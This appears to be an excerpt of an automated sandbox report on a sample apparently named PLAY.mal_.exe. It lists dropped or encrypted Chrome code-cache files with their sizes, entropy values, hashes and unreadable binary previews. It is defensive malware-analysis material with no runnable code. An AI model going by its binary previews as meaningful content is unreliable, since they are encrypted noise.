        Preview:+..3...m{Ah.vr.|....t..d... .u....0J8.3O-./x...L......\E(.o-,.4.G.$...j..}).[.:....Y..p@.,*.i.5.h..Y#2.v.A.5.Nm.a21x........=..lX ...ue.[..|.d.p7C3....g.q5l...J.\fOu...8#........aNP/... 1U..9...../.8.n.6.Wg.3"...<`.....Q."..$.:.^B/.J.I0H..L..84.../..i...=K.F...wf$..y.^..N'=Q..{.....Q].{...f4......Po"x...Q...k.Q8..I.7Z...OsS.dB.!.`.aVRZ!.....L.jpFG<Gt.v.....|`t......5U..YP..G._z.6....h.G.n.4.h...z.>Q...D.a.s1.6..I..[.6.I.[tbM!v...O....V9...x.K.f...!..p..*>.0w..!.2...<...<..&..L.W_@,ey~f!.H.........,.m.L>2..(.Q..K.....N..x...#...O...../2....!....eHN.....6.)w~...aY.!.O}ts|..%%.46..^#....~....$v..U]......l.....!X..4.. .....W."..f..{}0.8..x8...H(K..@R."W..3E.._...Q..wB.e.Tr..o./....UdW...z.7M.....Z.}..z.9.".{.d.2...v..J..-k..i]<.Je...T.C....5...{.R/.........Q....^U..{...H.I..].=...U..F?............lT...,eZ.+.hQ+.Z..H.7....".....t.).5+u.........d.K...wJ..^.%..l..]Af'.<.vd.>......H...XzW...Pm.'*{...otu...a$.....o.h.,.."GP.7...}'.i....a$|..O.G..O..'4..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\99fbbd13ad205f5c_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1528
        Entropy (8bit):7.889501831442723
        Encrypted:false
        SSDEEP:
        MD5:A4AC7052782A2A012B37D387F17B73CA
        SHA1:677EE669F41BA605150D197A490D7237867A3A43
        SHA-256:E58A5741E7FC5BB359E8301CCF742F3D735F058CFDE3A292796F735FFB0FFCE8
        SHA-512:9A695AC9FEE1ABD36B5C0606F8554374213C10DC27E762DFB036CEA08F2F5385078F3AE8BBE37B3D977848664E61A417D865F35541052BB7639672D0E296F626
        Malicious:false
        Preview:.k5..z...T.5$C..........j?..Oo............yr..&..\p.i..[..!o."..<.6..:..9.....@...i...D5<.G.A...p...U..b..q.a....4..Z.t.R..B!...zyg..^.=.O.N.:...m.W...nnT.z..[.^..6+.\..R.q..?#)..^.-.......=...-E.....+..2.wU...dx.W.f.]...F...V3...C..%^.6...R..0.....1..(Tn._.%Q....;.....~R_..X.....1=g.r>...j..])T.G.whWD.:..LO.8.q3O.......D.........J.....(k<X.J......~v^.d"8...x...o.iI02....m..x.2HBF"....B....q..x...j...#....t.:...L<_..~...\...{+.nDx.DI...sn......T..U.|.!.I>...............................s.U..qA..}..85.H......!w.:%.x..G....<.D.ww........4.r.870......ej.{..9....hN.`*9.FdQ.Y......$......[;..j.E2W...Z..U>.Qu..j.e..w....7.V.9....L. \MFy..%.v.*T......N.L4wT.Pw..).z3.8.,1+....S.#.<..F-..C.0........_k>2....IF..A\...k.O.........do.6#S...X...C..130..Y..o.7...h.!.;.`.......8...7%|..o..4.......xW....Bu<...y]h..\wE.pQ.S.'...X.eG.A....p&........[v.....@.....@1.................Y.z......Z..N..|..6=E^..?....$...*P..z.U..|!.M..HS.S.a..U.G.=.Xs.{W..%M.....n.~.;..#E

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\9aac68df8d0c7a90_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):58840
        Entropy (8bit):7.996657081304729
        Encrypted:true
        SSDEEP:
        MD5:4495386F77CA98C864F0F3C2ED21A5B0
        SHA1:A4671D9BC74D77D2EB1B776DA2B785D247A084FF
        SHA-256:43B43EA45EDACF37BBB6227902B76E49566618163FB4A78BBC5C3AB741C3CD98
        SHA-512:C5253CBB05F99D7764D3E92BF43E88CE9C0F8599A23C925D84FDE05B2B5408E43546F70D0B1E8D1CD8D08247BF58748C3E5A9DD53DBB3E4570777180E37EE5DE
        Malicious:true
        Preview:G...K.g.Q^....6iQ.D..u...1.~......l.|5.y.....9..).....~N.M.*.....<.9\d..s.....b.qxX.....h.Hb.#..cP.R..R..*........~........$...!#.#{..(=..D,....c....W..`..;......-2..S...;.IR.m.%?.eN...W......e..a...6.pR-73bp..K.b.....-q|2)..M..1.v..G.....'4...7C....aV......C...EwK;..aX..0m..\Q.....>.\..F.`....O;.A......I.I..u .5R.|.....b...N....../.J5.P.....P1.i$~f.......X..C....K..ji....!..rrb......g. .F:8..n.=+.PY....._.2.....p./2-1..O.#.._..C.....;$...E.yR....{.v.....*..f.\6~TSy+. .|.5..i...mcd....R......u......(.!.B.o.....B,q.x.F...`u.;P0^.Y....\].,.+..P/...k.......FD.B.V.n....c.....+CJ.a...".!...o....{..1*.w..AS......x".N..8..}.X.c..=..s................d.G..oO..s..{.?.?c2I....._.s.........?.dN+i....`.m.....A......MD..Mj....T>.\..........T...<...Bi_.=rv.........zQ.#.....W9.H.....B.<*......^bv.P.J.....5h......&..=.....Y..u..cR...M8b.%4..*....N..,..hX...u..... .6...&...].............W..V..PM..{.rNV...64.{.....t.............T..v_.y..#.[..Z;:{...SU..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\9d6041a3c725d0dd_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.83866052345837
        Encrypted:false
        SSDEEP:
        MD5:A06C2F79F48C71450AAC3FE119AB8A76
        SHA1:AE8A4F28D0AE37ADEF9877D46CF2917008081DA7
        SHA-256:BC2AA5FE6CCB283B6E759B6CA6E3F7F03EE48C671886FAEE5CC65A66AB29AAB8
        SHA-512:08968E20E3CF46EB1A91452B170407138CDD6501C1C2A78B1919912C318C346EF705C09A81F0160000B53BFC32C29A9951F2CE8532FB72EBA60428244E28FA34
        Malicious:false
        Preview:...0J.2...H..x..%A........^g..>..]i..{.G.." .JO.^..F....G...I.!.NK......V...%.}.......M.r...zE...pM..s[H.|..eI\3.....I<..0V0..q....Le.@.|.......=k...}B.....r..a.$B..a...F...."7`...|..c"...[L..w.....T..D.1%...|.....+..f}.....+<..>t..V'5............d4.t4.U..I/..i.D.P.K.a.g..6..2..M'.=.?.]..`.......Jso......_....0\....N.C..^..At_ ..^f.x.Oe}....8.:x.p.k.o.&.>.Z..5...0}.W,j..A.{..c...T..U.|.!.I>..........................J...2B..0W.......X-.wB..g!...:...I..*..2I@.l.C.$...F.K..-.....n.r1i...}n.e.^.w....p..c...~o....@......G..........n......)=r......."Ky.e.}...@....c..$.O.(.9...|.&......Gm}z8.m.._..i.9.../.....x......o.sr..E..S....yN.^..X.g..\..R+...A..k.A...;.bo[....J.F4r....D..A...l..&9q...*.!........[.f..v...$..w&~.!.#y.4l.z.X..._...........sMe.3.)@.T..D.....{.B..\.Z^..I;...1((...P}..j.T.....2...El@....b..B...o.L.z'/w.`......J.[@.B8.g...S.g...=i...'.d......"....`.a:dw.p..:.Q.Tc..oJ...5...RkWp...m^...O.gf...g..[u....%f.;.o.U.....|.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\a1ae1b82121938e8_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2088
        Entropy (8bit):7.9133138114031505
        Encrypted:false
        SSDEEP:
        MD5:B243F7A23E06422F75B512F81F70BE5D
        SHA1:4F0EBF73C5BD74579535D9BB0BBCA16641F5FDBD
        SHA-256:6B33E710B1BAA3BA935F171C88E5DD455C37C411AC6A55126FA7DC857ECD7AE1
        SHA-512:DE47BDEA0036ACD8FD19125388E449B40E35311B1E80479A60043411C04722EE66683AF517A842CD5FD709E66194392ADFF2A5B9F9C7C4AF9DAAE87B65B24D71
        Malicious:false
        Preview:.f~?,......\R.a5..&q.=..n...#...B...{.([.bl....r.u.^.'.y .\.h}....0..bpzl.J.....7$A..|...5....C....3B.Z.Y.........%...$......hS......t..P<..7.4%,..5^.].}e..|U........4......"..H.<....-..%...H..tv...Z....."...&..g.....\...73...9.v..Y..F>..#].(2.......N.P..}.|..SoMev;w:.m.....oa..'.p..J.<>....N.'"...........;..iA.A.[....Q.9.<W.J..f.#..\.r....~%..AY...2._X.n.GY..o./...TM.&.~..?..M77H..........R..._N7..[W.]...!.n....[..n&..p#....P&t....i.+.\..co.F........tb..@..g.g..u.#I8S.4...s...S..)9..g..e..B..s.....y.Ao.g0....P.>V....{...o.2!..]F<. VF.......O.%W.;8..S..p.#.....g..'X.'.%...x<.Z......0.3.45...'@E....9R.P.....l.h+.K\.X...26n...VD81:.,..q...&7...).....v...5...g....."..z_;4.W.....[Z.....E.9.D...r~b@.Z..+6C.T||......h.#\ih.4..K...:.3$.1.3.CQ.I.8.G..M.D...V..K......dr......=f..+.."....c.<8?!.0~.1$..TJ..2@.!4.....8-V.].@P....0-a..kG....d.....WZ......A]..fz..n...K..!...R......A.erv..T?....Z.Z.x^s....3I.2.8.e........y&=.P.D..-..A.f.VWK

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\a98e8bc1ce64e2b3_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1304
        Entropy (8bit):7.812041714196363
        Encrypted:false
        SSDEEP:
        MD5:BBEF2D6C7D3B3AB0E2A75B60E23828B3
        SHA1:FE5C6BF982DDC6ED3F43B4E344FE9194A6D547CA
        SHA-256:6AD94DED07606FD7880FE5283F4B51A74D856DB218E0E56D798C69402D342A4F
        SHA-512:C7F3196E8462DFBE43241D498132B107D8B79AF1F2A2DBAC7392466D38B19DFA8DCEEFA2DDBE9D0A0A0D96BCEDE0A53FB0BDBF6ED7E8FA648CCFEA5B649A8E12
        Malicious:false
        Preview:...:..55...t..v.....8.d...V.@W...U{..q.......}.s)@..?qg...g.....o.tm..Of.K......a.u...:..#.c......1.d...X..K*..t...Y...9={...WM..g.D... .....}7.GE.EG`..eMg..+.2....a..}.yS.\..y..q.I.6."...8?O.wV..br.s.bD=...U...6[...|X........T..U.|.!.I>..........................}I..i9F....a0{..4..{.Xj....^2{.W......=..V...w.4...o.......8.....C..[F..@......0...o..@.=.YX.......O.)...0m....&.\....D.s.\..(.S.wq..:..O.t.r......\.....A4.$.-...Ek..=..q...kW..;K. .].....D{u.PrD>B%.......B..n.|d.C{..u._X=?s...N0.NB8.=.K;.....N..Y..7..u..bpAw....Y..<~......<....N..O......yU.a6...zI...8..e|..7d...T-..(K..8..9a.k9U.Z...bS..m.Q....$.....u=(.~t..I.......w...$=nI..Bm.~F.....l\.Atno.N..zd<.I.Lvn.....RX....N.E......."...B/.u.0.....x..`b..QS.t....#...^....3waZ..?.....m.2H,.$.........@~...0.|E*vhJ........}[,.....!Ny..@.b.....Z:....l.C<.vg1m..._C..<..,...:..f.........i..LU..0.?..d.2X.M..+......@.....].k.X...m...[}.N.^..rL..(.a..<3...p+s....u....+2t.i.Q<O... I.\.j)

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\ae276f63f5a595de_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.844349558213334
        Encrypted:false
        SSDEEP:
        MD5:C3E6DA1A67077F2A5F40F7AB55546314
        SHA1:1B3B80575D8F21C85C84799F25459EEEFCF8708F
        SHA-256:B6D264E84B30F5ECD0782CEDC09A383787B5BFD551AA656DD7ED7B77087C8FF9
        SHA-512:2EBD2BBD9FB9866612F165B8129D6424969E0DA14487D06455F0C17488F52E67C592A95EF205BC2608594B6D26F4250A52D7814136B7DE91C90EAF7640B5177B
        Malicious:false
        Preview:.. .b......Hd.p}ta'..Zc..#....`.0j5mi.@?^|..tA....C.}.PxgE......w.I.3Km....=6.0...6...n8.H.6NRC..n..b.g.2.-.?~.1.........^...#.+.....lSp...H...vxH..........gaU..\^...4`.2......\g...2.Z..6d.Lv........7A...|...T..U.|.!.I>..........................:....J......yw..5v..`.....4....;.|.s...U........FS..\&..XWji.a0...<.....|...9....%.17...VF..n.Eohj]..fG...A.oz..v1.g9..F.......Go.....%...I...^.d.h.V.1{..O.8.(^).Ut.K..WY..\...e...+K.F.$.\. ...!"z..Agb.J.....K.o...l',b.M..;7..g.Jz..K~.vI(M....m..........P..Z..A}..q....(....P.k.kJ...dY.[.i.m..Lo....B....n9.5......9...w.A...Zqu...<M.7.T..O\.S.ef.2..O..i.pPE.0......km1]E....AF.!".wa<.q...hXZ}./.eh./<...$.....Pb.IE|#....'.fq.5.'R.7I.k....#n.S...H..5L?..-....m....q.....;>.L..!...dLH#<.Io...=.$....U.h.5..QP.z...Z3.z}.QMF.2.+[.=.oN.._.w2.gh.I.on...}.T.....g?.....<..(.e..'.Sa).lx...2.s..6.\=....z:j.<........y..&.t....K$F.l.B*..zv/.{?.;...7.KM1..+...U....`.dO.[l5.]c.(......~......'.....LJ>...}

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\af093619a7f7877c_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2376
        Entropy (8bit):7.918995317566268
        Encrypted:false
        SSDEEP:
        MD5:55CA5FF1AF6B1F244257AD143EC2B15E
        SHA1:4A0B5469712624CC2C02E5F9BF38A66353EC278C
        SHA-256:FC9C9A375CACDD140B348CC815BC02C41DBF9F36CE9EB93C72A8DC7A151716B4
        SHA-512:31F1CCF3A245F5C3EBE44A218A08D90092A94AAC9D25A54AF4488EF9022F254BABC339B9363B7BC0228ED9B26D87DD8C5DF829D04A2C8B1E0BC1141649392677
        Malicious:false
        Preview:...$.;..}J..7..>;.b.84p..cXDQ=.$......o.. .m1...TjO5:Y..GU....z7~.B....E...ZJ......2....'..6).kI!..;.O.q.^..,...*9G...`..2.....9.....N.r..Z...y.($......h.b.....=...B.5u..j!..t.....w..n.P..4....T.4..7..}d.....-.G!...m...8]I.T ".V...U|~.;'..Q...#....._........|.......=.Y&..@L3.7Ou...W....O..U.?....F.<..!{.+o|d........ ...D>R...AJ... ..V.........f....AT.2i..4.E;..NL`r..+W...c.....$5..,.x.0.k..,..IJ.)...J.N.5]..%..nB`...W...aFVh.;..%gb..&...4wNI....`P.+T......Fz9..P..v......`...yf..|L2L....q....w..K_.~.l.5....../...^4?F9,...e./....'%^.3..,........n.4:3...,u|9..4.K..P.h3........RY.ej}.wr......P.5.p3.._..D1()...rfx...l.a.K...).,}.-\.K..Dk...zO.C.Mz.2.R.D.q,..%...:g..P>+.0.{$......Ii.........!v..ML...U..0../d....9..1.....69A..f..g.0r........:.......R.L..(......t.w....b.p...<*.5Pv......[..w..3.......h.&.;\..$R:D.'....4d..........E.I17.p.J.%.T]....&......%.hr.J~......"}.w/....A.>...........[..+.P..>.*g...{...E.w.i......C4..WY.dF..d..d.O.$.........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\bebbf0a4fa320847_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1336
        Entropy (8bit):7.836885452983319
        Encrypted:false
        SSDEEP:
        MD5:DD94314FA32B64C6A14C8E6A5E546823
        SHA1:9BDE9FA4F03E7706FD98A2530FD4612870CE90EF
        SHA-256:3395E3F4932CC632E4E5C6962C927022811F1843E2BBCB1C0E6F6283C239E41D
        SHA-512:137C3E1B51241395CAAB50F5935A04F07446BAD9A81BB3C628930497493DFFAE152652C064E1774FF35753ECAA6C91643580E21D829965C52485B43B45E01AD5
        Malicious:false
        Preview:...C..!.i.....,....X.w...6..@o.oH..........$>.f..p..nz....YV..*..sZ4>.>H....M....0..}....X.".c.]...\.&"..e..:.....f..( VC.F..cQP8...V....1.:...r.S...y..F.^............84U..3.C4....N..L,.1;.....0.=HP...|..}........t.L.&..yB.x..=....AR@\.r..E..z..l.W&R:!..P...*...T..U.|.!.I>..........................T..s.e|c7...T..k.A...n%......(8.j..#..?X...%.u.....+.#.l....y....u....B....P..*.,K.....2=k=t...)=.H..k.e.......h..\R.Y.G_`. ......5e..d..5..g9h...........L.s.)Y-.O....4t.Fx]..z.f..#5(K.#.>&.E..\c...]] .h...M....F.......P..g.$N.:*..$x.FL..f..o..v............g..p... T........2...I_~.a...-..]..,Y.:....w.ba8..r...Om.%X...z.........?.;.0...(G.@.pl^c..[l.x.e4G../.Q.v...jn...>Z.9..u..EXE....7..M7.o).2.Z..Q......~.fk&H...r.#...x..].pu|..Kwu....gO........M../...L....3h4....Wf.~......U.Bj.0iu..|Z..4.D..:....q...d... ......B.-..{.|..s1...}9prY..g....5.I...$.3)?M&.....&@...9.6..7......_)4b....].d.n...sH..RR...!#.)..D...-`...m..A..:AH.....M.Z...Pr.IP).A...`..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c0f40f633d039512_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2312
        Entropy (8bit):7.918390807967316
        Encrypted:false
        SSDEEP:
        MD5:13304E399C9DB741DC19B796A7B0F29E
        SHA1:BF6A171D8F2DAEBA87214DDA6AAADA46A76E72A8
        SHA-256:898194F364B0AD2C9C7BE0FEEF8F547DC1D55838EB81A42D9201F04EC418E2F4
        SHA-512:21C20B951C3CCD05D270585240A5F5FE3C8EAC9D414123F4F2554D250A4CFBECF922EEE7AC5A62DA48F18A314F0E1566B50A580031E2BCEAF6BB70E68FC021FA
        Malicious:false
        Preview:..@t.!.q.Q.l.q.7Q.v.......~....*...NX..........x...W0.<...m...S.U..!.c..F...gU..!S....l..9...J.N....!gt#.0..6..!Cu."+m.....K..O....@A..._..S...Y.U...G......\N..`:.6`^..2.........^|ZB3.s..G<*.....c#L.A.f.l.....S.....89F....v...i...z.T'..m.:7(.(.P...].f.9s^.&..&.~.8\.x.!.&....b....'h.;.A$H...O.~..`V5..t.r....Z..\.&...k......;.J/.EJ6....D.P.."......l..Yh......p...VW.RF8.......`...0..._VD.}.;.....s...C.o}.'.....v".z..m....q.>.-..].....,hMv..&....W.;.R.u...$.<..yxr.d...d)....Q.....WB.8...T...8.Pd.y.<...=}......8.e^....R......yN|U..[..s....Gg>..%.>.3..,......S+0D).O.On.......t..r.....:|..EU...,p.....6V...........~._.`z.G..*.t..B...?}.....k:.....}n(4.P..5.d B.%.u.vA..MN.wo_. .....;.1.5p4.ET-..>(.)Qy&_J...k.6/?.?.6....:.!...t..I,)...d3....R.:.!.f...%.=....3T.g.._>.......,.y.}.s..=).W&%.X.2...m.....7.g,..&d.<b[3.........>...K.:...s..l.O..?..~..qk....d...0e..,.0.....Rq.....bO....,..T-.v.]..)....4......f.PV-..-w.J.U......J.V..&..f.U...]r.|$.....O.P...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c7f24e4bd8dada7f_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2920
        Entropy (8bit):7.951793117015256
        Encrypted:false
        SSDEEP:
        MD5:636FE7B158136F9744A497222D6FC33F
        SHA1:8850BD5361DF19A52D27ADDB9DB7FA772290D243
        SHA-256:F2264489ADE896CCC2837CA4B4EF54C33A9A466803228DB2FB615BD7D9D8C2D8
        SHA-512:D72CA3B4C9A2E4920E840C87647B7550E3F3020514215CE754AE5D49F01C219DA946C576B18C48A875BEE30345D948EB897DE7B5D6F9A63C45A099A8AC57D45D
        Malicious:false
        Preview:..1..lU.s%....$...5....&..._.".'..0...j.....u...^....'R.-....f.d...S.G.B?..G.u]..". (q....'Q/......X.k.C...V .. F'W.-.....-.O.g...8TD...@..Wy.$.v@}M.yE.Z...2.=..<.VRmRL^..P{.'O_..i.3.uGg...'..1...x.q..6bj........N.z.@.....@v<X.!.M....z.h......6..p.0p.....|.6....m3......%.|@jH.....-..U..y*.X...&..3....S...?!..u.[.c.is.M)..OOd....0qf..a3N.....M.;:...I.p.'@...Q....~@.4...Ze..J..t..Co1.H.'.....R.b...G..B..;...3;n!g.A.cQ=d.,..F...XA#9.M...@.....R ..g..[....>8.u.)X.Sw%...pc.{;.^c.{......J.A...p..g..L.|${......qqm=.L...cIo...V.}:{.3;....o..6.......|...~|_...JqwErM.../..GrO.Ky..l...B..e.Yw..r...<....W.1atW.8.o.~*{~.S`&..`.....Uw.Q....".3.^o@..\O......N_...S$..Xh..+....'O.k.........VB....d..lC..M.9...?.`...'.s.6.;.i....:E....l.#.Q.5hYmw...v..&[."o..O..MD7....<..z.i*.7....3..;8...)O2. U.x.I\..........mDz...-..8.-...'A..X..D:.E.*p.Z~.?......#...CX.;..j..v...c.^....95...Kk2PB....!]1....e.6.."l..'.K. .gx.....M..=$IG...;9pK.Z`!.W..6..B...GN..4..C

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\cd472734465da5c1_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3176
        Entropy (8bit):7.929621252385555
        Encrypted:false
        SSDEEP:
        MD5:647B782BEA1A9300C55F70CC5AE11D20
        SHA1:83B92F00A8C5DF2F62F8D9D86254A7411E9E0746
        SHA-256:6FFE7863F254A8B4FD4D4240216A771E76C4EB42A553F5B03567352926162F8F
        SHA-512:743A58107385DC342EBAD3F5D41EC1EBBEDD4A40FCBD0085190EE9F4A91703782B887A3D0A9635D918F152F28AC0DD8778BE9CF995A4A4EC4683BC4B1CBD545F
        Malicious:false
        Preview:{.s=...x...L....)F...m"Zq}...)..h.!l.D...r..._.Icpy:...".....XO`TR.$..r...Y.&L....C.!hU.=...O.lc..q.xXP.>xn...-B..5.)......Dp....hZ..x[.l.%t....'8.....ei.-........1{,....l....t>..-.,..X..(....v..K.....>..Na..`H.+.0x.Q..Z;....)9c....f5...`...6.b....<.I.;|*...r...{9H.....`Y..s........}.+P..e$..~....(.'|..!%.FQ....Q@`.+j%.7.EaL{....iF.0...%B.gw...V..S...s.0gv.8.+........y.N....e.1..hJ..<o[x..e[..X......6.2.y.......1....(y...5c~..l.E])....}X..K.R..tz.#}...~.(....%hwN..v~v..h....+....i.U...-y...g..X..c....``....IA.g8....yr.q]V.C....a..ZHBcG-Z.T..2....*.d&BxZ_3...GE.O.!.i..}@....X~.......7.#`r..3d.Mx22.`..|...]g:w.....-........N(..j...0.C.~z.....N....0q.6.'Vbe..y+>9..?...^..p...8oZ63..&....J2..w.p.mi.W.a.l...B7`...........Oyy..Q$...tg..!.e..,.].]...k[gV...r..S,...f...9...-b.zw......k<D5.:?\.v...,.4.Ev.D....o<.......d.Jq...H.@.6M.7.<....6f.Si..j^`.M...R..Z0.c.)....~.D....7.4qQI.y....r.7...R.t@.7..b|..].=...w...ay.L...3.%l.fA.jk.4{....k..y.X...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\ce66982a2c6e4dab_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2280
        Entropy (8bit):7.9077268229636
        Encrypted:false
        SSDEEP:
        MD5:4F8DBBCC38E92AA5EB72D19B2042DE5C
        SHA1:0A5C3975D654C7E52B4B9359E89CC1ACF834F273
        SHA-256:39BF59BD62144AA526E6AB2B56B3C5B9774D5C5DDB92A9E1E793C2000449895D
        SHA-512:9B53252AAEBED97A4FD82CB1367E483694F18ED2FB96A5E45B65D24C9E726D47FA83B142A6E07DBC2C7751A9AA58F0413844F7B3AF4CBE15BD467226C73A9FE7
        Malicious:false
        Preview:D..........mB(_..0.}l...Hr`......S...........`.O....j.S....O&....._`?C.Yl*\!...v..S.C.%.z. .h.x...(.zZ.....~.LJJoS....#'.....b.E.....(..uhu....W.3^......J..I.t.......buwn`2.jU.f..;......Y.To.6[..#....8@P...Lj..)..O...{..m.\..$.|..AC....,.........eg.V...[j...q.E.C(e.l..yb..M..........T......v..e.d......C.3.]...cl.....u..q.>...F.iYa<..qs09....T.mri.-C.....{......dY2.....v.O7..&DU.r..kZ.T.....F_.~Y.#jZ........5R.q@`ibF.....{.Vet.1z.w..........X...=...`..)/..I...9...S..."/...=[f8...........j....P..,A...../.H........:.iW.]..R._.^...~T.\~e..0.n<...,bU"?...W...n...b..}UX..9..B0".........^.e.....KN<.....w.U_YX.......# #rr.....;..N..).s..r93..%......#..[;.*....ATN...s....`.8.-....U:,.p.....g.....P&..}...K.........0.h.^....fD....D.@..h..q.z..gV*.r.......7..Y..b...]W.0.E...&8.n..&.A.P.V.....j,..i...0u;dNv...v...2.y..A..?%..j.8...M.q.=."......vF..B.OY.AY{.....;....w;'V../.......W.kw..nY...u.}....rV.......\.k6.Tn.+i...._.o......q......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\cf7c0c62d2a87a0c_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1848
        Entropy (8bit):7.874133700604682
        Encrypted:false
        SSDEEP:
        MD5:0038D0DF773891877018E5CCC5A7207B
        SHA1:D0776418CA12C9DAE28437EBFAFCFF4D1C6AC191
        SHA-256:3B70C02F28F4292A8AF58F060687DF8BB66C3C8B0085142F0D5D1ED2C2CEB975
        SHA-512:B7665BCC3B81CEB8837386714396E2102909EE9158FCB2CD80DA997CE978079DDD927A891B465224CFCDE7AB89FD7B99DD104B1821AF9A6A3EC60A5EB506E06B
        Malicious:false
        Preview:.........n....v.}g.B..i..Zv..MA..`T.ls.H.Rt0k.*.F..g....t.?.S.4\.d[.;.y..z..}.7.yC.NG..5.+......._.....v-..p_...Yk..B.>..;A.3.._....;G+.au+.)..s..%..1.pG.Z.e...d...r+..$.Zk...u.|.Y.....Gh...:.... _<Fxv9.."H..r...;A.e............}LZ...K......S..Zm.2.O....y.._.....Q.g.H.....we..!......XJQ..W..'i.'..C..q.ay.o3<....Oa....g.!{.....:.....h.k\@..,....."qOH......8|).L...Q.....en2)....r@t.6..?.$..d...K.Nr..4K...W....uU..Q...;F...._...].{2......,.._w.Ke....hk.|...@.....HTQ..&..R.....2....%.r.2..\|q.=...y.Hs.R[....FB..G3.h..M@....va...!o-.Bc..[!*_....[..{..3.....>...L)mt.q.;Fwt.L.]......<$g...F.a..m..#-*..!aC...H.C.....OP<,..h..rb...B..X...?.|'4....R.>..!....XG.6Q.nD...$..;xu..d\{X.x.H.Nw..`.a....C.k....Tf.......yK..5.._p...!........B...F`......T..U.|.!.I>............................5......u....0..=..k...Wd...v.....H.r+.P....C(.....T..*....."..0}-?.......s...H)...@.....B.I.X9jl.....Uae.....p%..q..}....6}.U.G..........M.2.$.1.m.zi.?./.Coi..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\e0e29b32b66396ce_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3144
        Entropy (8bit):7.942711063235121
        Encrypted:false
        SSDEEP:
        MD5:D1778027AE823CED62B926398DAC9160
        SHA1:7FE09DE4C43A53B9296BD63CD2A8845A0946EFFE
        SHA-256:468F74472A14B4E8D4D64411BADABCD6B6D6CD1474FF13B0128362FED47DEFDB
        SHA-512:78F89812E77A2D550EA02AEA8ACA96A16707B8852B44518485A950CA035D79E122C951C8570D495B503CEEF5416B684DD33852426CC5A990AEC643081242B776
        Malicious:false
        Preview:.}....I...I.&...k....V-..X'..tA.X.ES:\I]...th..Em.q$....L4A%v...o.GV._.q.uz..|G...DJ...pTc.V..a..o.fn.........q..}....W.i2S.u.....M9.....Vo.G....o.....-...).J.m.!.......*E.9..[......%VWv...........9. |..n.U.VB..._(.....9.8.....@d...".k..Hy.f#...c.].H.dQ.."..dxm.k.\.P/0..S.....E;.}2Y.b....!..e.9...eM....B.7..."..^.z)D.j....#.6Zb".. U.^.Y......'-....1.s..nM.5.B..n...Y..O...}'.....V...!.W..8f..P..f..B..O....4...~.F#.:......+..;C.q...*...E.r..*.."...82....?]-...a.._...U.0....O..f0D9..D<....M..P.cN../%.....^..8S$..-.$cH...H..V...H..4k.S-.q...:.....]C..T..Yn.......\d.3.Mo..:......Q....]e.P.N..VV....z./.Kc1..2....N...1%.J...d...`...i^u/?a..G....\.p....z\?..i....bL....R.{Y...u.U..r..J..|..,..G...!.~....Z....or.S...tl.5....U..NJ... ...6....h....!j....>Y....`./.:...a7...K2.5.g.&.s.SP.T;...n.,..Z.].(.3..g......k e.3.E..o..C....l..L..........k.p...KI\;....f..8Qv...n^J....d...X..x.B....t..XJ....$`......,....$..59|.>....=X...7....8g;.o.s.N..A.n.F..].

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\e957e727b4de6e6c_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.870042651813873
        Encrypted:false
        SSDEEP:
        MD5:F6ABB7A487606A3B5F02291D8AD50E09
        SHA1:EC25AD06D852A98F2BA93D57CA93B4ED8275AB55
        SHA-256:C497CAACA14422B946F10A18A8D9D33AA0F551A56D3035EA55A766DF42E400AF
        SHA-512:042A7F6A9810F46B44FD7A80661C24B0F73F3C21AABDE4FCF77C1B44350F82F86E188F0FD5E761050F3DC2D65C15DB6695930E5BE570B5214AD48A80F6D061F6
        Malicious:false
